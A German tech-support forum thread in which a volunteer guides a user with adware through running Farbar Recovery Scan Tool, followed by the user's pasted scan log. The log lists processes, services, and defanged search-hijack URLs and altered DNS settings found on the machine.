Adware, Trojaner etc. Malware wahrscheinlich

EmreTprk · 21.12.2015, 22:14

Mein Problem ist das ich auf sehr vielen seiten werbung bekomme selbst auf Steam öffnen sich seiten mit Werbung und alles. Manche Porzesse kann ich nicht schließen die auf Steam geöffnet werden. Als ich meinen Pc angeschaltet hatte stand da Problem 1: Firewall Aktivieren.
Ich lasse grade meinen Virenscanner laufen (Bitdefender bezahlte version) aber ich befürchte das es nicht viel Bringen wird. Bitte antwortet ausführlich auf mein problem was ich haben könnte und wie ich es beheben kann. Ich weiß das ihr sehr hilfreich seid und eine Große Community ich Danke für alle antworten die bei mein Problem beheben können.

Bootsektor · 21.12.2015, 22:47

Mein Name ist Sandra und ich werde Dir bei Deinem Problem behilflich sein.

Bitte arbeite alle Schritte der Reihe nach ab.
Lese die Anleitungen sorgfältig durch bevor Du beginnst. Wenn es Probleme gibt oder Du etwas nicht verstehst, dann stoppe mit Deiner Ausführung und beschreibe mir das Problem
Führe bitte nur Scans durch zu denen Du von mir aufgefordert wirst.
Bitte kein Crossposting ( posten in mehreren Foren).
Installiere oder deinstalliere während der Bereinigung keine Software, ausser Du wurdest dazu aufgefordert.
Poste die Logfiles direkt in deinen Thread in Code-Tags.
Bedenke, dass wir hier alle während unserer Freizeit tätig sind, wenn du innerhalb von 2 Tagen nichts von mir hörst, dann schreibe mir bitte eine PM.

Hinweis: Ich kann Dir niemals eine Garantie geben, dass ich auch alles finde. Eine Formatierung ist meist der schnellere und bei einem Befall durch Malware immer der sicherste Weg. Adware lässt sich in den allermeisten Fällen problemlos entfernen.
Solltest Du Dich für eine Bereinigung entscheiden, arbeite solange mit, bis Dir jemand vom Team sagt, dass Du clean bist.

Posten in Code Tags
Bitte füge die Logs immer in Code-Tags ein. Wenn Du das nicht machst, erschwert es mir sehr das Auswerten. Danke.
Dazu:

Klicke über dem Antwortfenster auf die Raute #, dann steht dort in eckigen Klammern [] CODE /CODE.
Zwischen den beiden code-Bausteinen fügst Du dann deine Logfiles ein. Also CODE Logfile /CODE
Wenn die Logs zu lang sein sollten, dann teile sie bitte auf und poste sie dann hier in Deinem Thread, notfalls in mehreren Antworten.

Schritt 1
Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:

FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)

Starte jetzt FRST.
Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

EmreTprk · 21.12.2015, 23:02

Wie füge ich denn jetzt genau die txt. Datei ein auf das # symbol und dann ?

Bootsektor · 21.12.2015, 23:05

Ich poste dir mal eine etwas ausführlichere Anleitung dazu:

öffne die Logfile mit deinem Texteditor (unter Windows reicht es meist auf die Datei doppelzuklicken)
markiere den kompletten Inhalt darin
drücke gleichzeitig STRG + C gleichzeitig (oder mache rechtsklick mit der Maus und wähle Kopieren)
gehe auf unseren Thread
drücke auf Antworten
Klicke oben im Antwortfeld auf die Raute (#)
Klicke ins Antwortfeld
Drücke dort dann gleichzeitig STRG + V (oder Rechtklick mit der Maus und Einfügen)
(Der Text aus dem Log sollte nun im Antwortfeld erscheinen)
wenn das der Fall ist, und das Log komplett ist, drücke auf Antworten

EmreTprk · 21.12.2015, 23:05

Code:

ATTFilter

Logfiles also der Text komm hier hin oder ?

Bootsektor · 21.12.2015, 23:05

Joah.

EmreTprk · 21.12.2015, 23:06

[CODE]u
FRST Logfile:

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:20-12-2015
durchgeführt von Özkan (Administrator) auf EASYNOTE (21-12-2015 22:59:38)
Gestartet von C:\Users\Özkan\Documents\logs\Downloads
Geladene Profile: Özkan (Verfügbare Profile: Özkan & Gast)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_WT50RP.EXE
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMutilps32.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Windows\System32\alg.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2016\vsserv.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2016\bdagent.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2016\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2016\bdwtxag.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2016\seccenter.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2016\odscanui.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2016\bdwtxcr.exe
(TeamSpeak Systems GmbH) C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\ts3client_win64.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12343400 2011-12-27] (Realtek Semiconductor)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2821936 2012-03-07] (ELAN Microelectronics Corp.)
HKLM\...\Run: [Bdagent] => C:\Program Files\Bitdefender\Bitdefender 2016\bdagent.exe [1720488 2015-12-10] (Bitdefender)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Run: [Bitdefender Wallet Agent] => C:\Program Files\Bitdefender\Bitdefender 2016\bdwtxag.exe [1423288 2015-12-10] (Bitdefender)
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {1c281590-2b6f-11e3-b71b-b888e3cf1a37} - E:\LGAutoRun.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {6b7e0915-f87b-11e2-9524-806e6f6e6963} - D:\AutoRun\AutoRunX\AutoRunX.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {6dccb73b-6b4e-11e3-accd-b888e3cf1a37} - E:\Startme.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {720267d0-76b1-11e3-8f9d-b888e3cf1a37} - F:\SETUP.EXE
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {81dd1ca2-40b4-11e4-893b-b888e3cf1a37} - E:\Startme.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {85a61aa3-6a20-11e3-a24a-b888e3cf1a37} - E:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Winlogon: [Shell] C:\Windows\explorer.exe [2871808 2011-02-25] (Microsoft Corporation) <==== ACHTUNG
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  Keine Datei
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\avsinit.vbs [2014-12-15] ()
GroupPolicy: Beschränkung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG
CHR HKU\S-1-5-21-1539430812-113463742-2149372525-1000\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 80.69.100.212 80.69.100.205
Tcpip\Parameters: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{A03D809F-5B31-4946-837B-6FB4B372ABD0}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{A03D809F-5B31-4946-837B-6FB4B372ABD0}: [DhcpNameServer] 80.69.100.212 80.69.100.205

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://feed.helperbar.com/?publisher=YahooOC&dpid=YahooOC&co=DE&userid=2ac0c14b-4b89-a50f-9f67-eee28738adc9&searchtype=ds&p={searchTerms}&fr=linkury-tb&installDate={installDate}&type=hp1000
URLSearchHook: HKLM-x32 -> Standard = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D}
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.sweet-page.com/web/?type=ds&ts=1389711833&from=cor&uid=ST9500325AS_5VEWMD68XXXX5VEWMD68&q={searchTerms}
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://binkiland.com/results.php?f=4&q={searchTerms}&a=bnk_ir_15_11&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0C0FtC0AtAyB0E0DtB0EtN0D0Tzu0StCtCyCyEtN1L2XzutAtFzztFtAtFyEtN1L1CzutCyEtBzytDyD1V1BtAtN1L1G1B1V1N2Y1L1Qzu2SyCtC0E0F0DyBzz0FtG0A0A0BtBtGzzzzyEtBtGyEtCyB0EtGtCyEtAtCyD0CtCyC0D0AyE0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0FyDtDyC0EyEyEyEtG0Azz0F0CtGyEyE0AtBtGzz0C0DtAtGtAtDyC0FyE0AyD0E0BzyyCyC2QtN1B2Z1V1T1S1NzuyDzztA&cr=1274114559&ir=
SearchScopes: HKLM -> {0b4d26f6-61a8-4463-99dd-5f2fe0400fa6} URL = 
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.sweet-page.com/web/?type=ds&ts=1389711833&from=cor&uid=ST9500325AS_5VEWMD68XXXX5VEWMD68&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {BB74DE59-BC4C-4172-9AC4-73315F71CFFE} URL = hxxp://websearch.toolksearchbook.info/?l=1&q={searchTerms}&pid=377&r=2014/01/25&hid=7633288193344046592&lg=EN&cc=DE&unqvl=46
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.sweet-page.com/web/?type=ds&ts=1389711833&from=cor&uid=ST9500325AS_5VEWMD68XXXX5VEWMD68&q={searchTerms}
SearchScopes: HKLM-x32 -> {BB74DE59-BC4C-4172-9AC4-73315F71CFFE} URL = hxxp://websearch.toolksearchbook.info/?l=1&q={searchTerms}&pid=377&r=2014/01/25&hid=7633288193344046592&lg=EN&cc=DE&unqvl=46
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> DefaultScope {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3323924&octid=EB_ORIGINAL_CTID&ISID=MDB38BD5A-627D-4D67-A512-61EA37579F5C&SearchSource=58&CUI=&UM=8&UP=SPE5FA9EB0-C88B-4E6D-8C6B-62C3590A80FA&D=051315&q={searchTerms}&SSPV=SPJSP2TA_sp_ie
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> URL hxxp://search.conduit.com/Results.aspx?gd=&ctid=CT3317933&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=58&CUI=&UM=5&UP=SP1188471C-B9E3-4D82-BAC1-E62C126C7D6E&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL = hxxp://feed.helperbar.com/?publisher=YahooOC&dpid=YahooOC&co=DE&userid=2ac0c14b-4b89-a50f-9f67-eee28738adc9&searchtype=ds&p={searchTerms}&fr=linkury-tb&installDate={installDate}&type=hp1000
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://binkiland.com/results.php?f=4&q={searchTerms}&a=bnk_ir_15_11&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0C0FtC0AtAyB0E0DtB0EtN0D0Tzu0StCtCyCyEtN1L2XzutAtFzztFtAtFyEtN1L1CzutCyEtBzytDyD1V1BtAtN1L1G1B1V1N2Y1L1Qzu2SyCtC0E0F0DyBzz0FtG0A0A0BtBtGzzzzyEtBtGyEtCyB0EtGtCyEtAtCyD0CtCyC0D0AyE0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0FyDtDyC0EyEyEyEtG0Azz0F0CtGyEyE0AtBtGzz0C0DtAtGtAtDyC0FyE0AyD0E0BzyyCyC2QtN1B2Z1V1T1S1NzuyDzztA&cr=1274114559&ir=
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3323924&octid=EB_ORIGINAL_CTID&ISID=MDB38BD5A-627D-4D67-A512-61EA37579F5C&SearchSource=58&CUI=&UM=8&UP=SPE5FA9EB0-C88B-4E6D-8C6B-62C3590A80FA&D=051315&q={searchTerms}&SSPV=SPJSP2TA_sp_ie
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> {0b4d26f6-61a8-4463-99dd-5f2fe0400fa6} URL = hxxp://search.conduit.com/Results.aspx?gd=&ctid=CT3317933&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=58&CUI=&UM=5&UP=SP1188471C-B9E3-4D82-BAC1-E62C126C7D6E&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://www.buenosearch.com/?q={searchTerms}&babsrc=SP_ss&mntrId=04780A942350AE93&affID=127690&tsp=5197
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.sweet-page.com/web/?type=ds&ts=1389711833&from=cor&uid=ST9500325AS_5VEWMD68XXXX5VEWMD68&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> {BB74DE59-BC4C-4172-9AC4-73315F71CFFE} URL = hxxp://websearch.toolksearchbook.info/?l=1&q={searchTerms}&pid=377&r=2014/01/25&hid=7633288193344046592&lg=EN&cc=DE&unqvl=46
BHO: Bitdefender Wallet  -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2016\pmbxie.dll [2015-12-10] (Bitdefender)
BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2016\Antispam32\pmbxie.dll [2015-12-10] (Bitdefender)
Toolbar: HKLM - Bitdefender Wallet  - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2016\pmbxie.dll [2015-12-10] (Bitdefender)
Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2016\Antispam32\pmbxie.dll [2015-12-10] (Bitdefender)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652
FF Homepage: google.de
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_235.dll [2015-12-09] ()
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-10-12] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2014-10-12] (Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [Keine Datei]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_235.dll [2015-12-09] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1203133.dll [2013-06-26] (Adobe Systems, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @ngm.nexoneu.com/NxGame -> C:\ProgramData\NexonEU\NGM\npNxGameEU.dll [2015-08-04] (Nexon)
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Users\Özkan\Documents\my games\PB\GameData\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [Keine Datei]
FF Plugin HKU\S-1-5-21-1539430812-113463742-2149372525-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Özkan\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-06-08] (Unity Technologies ApS)
FF Extension: Adblock Plus Pop-up Addon - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\extensions\adblockpopups@jessehakanen.net.xpi [2015-12-08]
FF Extension: Bitdefender Wallet - C:\Program Files\Bitdefender\Bitdefender 2016\antispam32\bdwteff [2015-12-16]
FF Extension: Adblock Plus - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2015-12-15]
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2016\antispam32\bdwteff
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2016\bdtbext
FF Extension: Bitdefender Antispam Toolbar - C:\Program Files\Bitdefender\Bitdefender 2016\bdtbext [2015-12-16] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2016\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2016\bdtbext
FF HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\m4d0ej0b.default\extensions\cliqz@cliqz.com => nicht gefunden

Chrome: 
=======
CHR Profile: C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Präsentationen) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-08]
CHR Extension: (Google Docs) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-08]
CHR Extension: (Google Drive) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-08]
CHR Extension: (YouTube) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-08]
CHR Extension: (Adblock Plus) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-12-08]
CHR Extension: (Google-Suche) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-08]
CHR Extension: (Google Tabellen) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-08]
CHR Extension: (Google Docs Offline) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-08]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-12-08]
CHR Extension: (Google Mail) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-08]
CHR HKU\S-1-5-21-1539430812-113463742-2149372525-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kfecnpmgnlnbmipaogfhoacoioifjgko] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [dhhejlifdlcgcmogbggeomfodgklfaem] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [hpomcmndppalndoljdilmfkkjkcnongl] - C:\Program Files (x86)\1clickmoviedownloader.com\clickmoviedownloader10.crx <nicht gefunden>
CHR HKLM-x32\...\Chrome\Extension: [kfecnpmgnlnbmipaogfhoacoioifjgko] - hxxp://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [669872 2015-09-15] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2016448 2015-11-25] (Adobe Systems, Incorporated)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [448384 2014-08-15] ()
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [161560 2012-02-08] (Intel Corporation)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [857288 2015-11-09] (Bitdefender)
S3 Sony PC Companion; C:\Program Files (x86)\Sony\Sony PC Companion\PCCService.exe [155824 2013-02-04] (Avanquest Software) [Datei ist nicht signiert]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5491984 2015-05-20] (TeamViewer GmbH)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2016\updatesrv.exe [124488 2015-09-29] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2016\vsserv.exe [1604080 2015-12-09] (Bitdefender)
S3 ACTION_SVC; C:\Program Files (x86)\Mirillis\Action!\action_svc.exe [X]
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 Mobizen plugin; C:\Program Files (x86)\RSUPPORT\MobizenService\MobizenService.exe [X]
S3 MozillaMaintenance; "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" [X]
S2 Tender Switch; "C:\Program Files (x86)\Tender Switch\Tender Switch.exe" [X]
S3 TrustedInstaller; %SystemRoot%\servicing\TrustedInstaller.exe [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [1600512 2015-10-28] (BitDefender)
R3 avchv; C:\Windows\System32\DRIVERS\avchv.sys [282000 2015-09-17] (BitDefender)
R3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [775424 2015-09-17] (BitDefender)
S3 AVEO; C:\Windows\System32\DRIVERS\AVEOdcnt.sys [305920 2011-10-24] (AVEO)
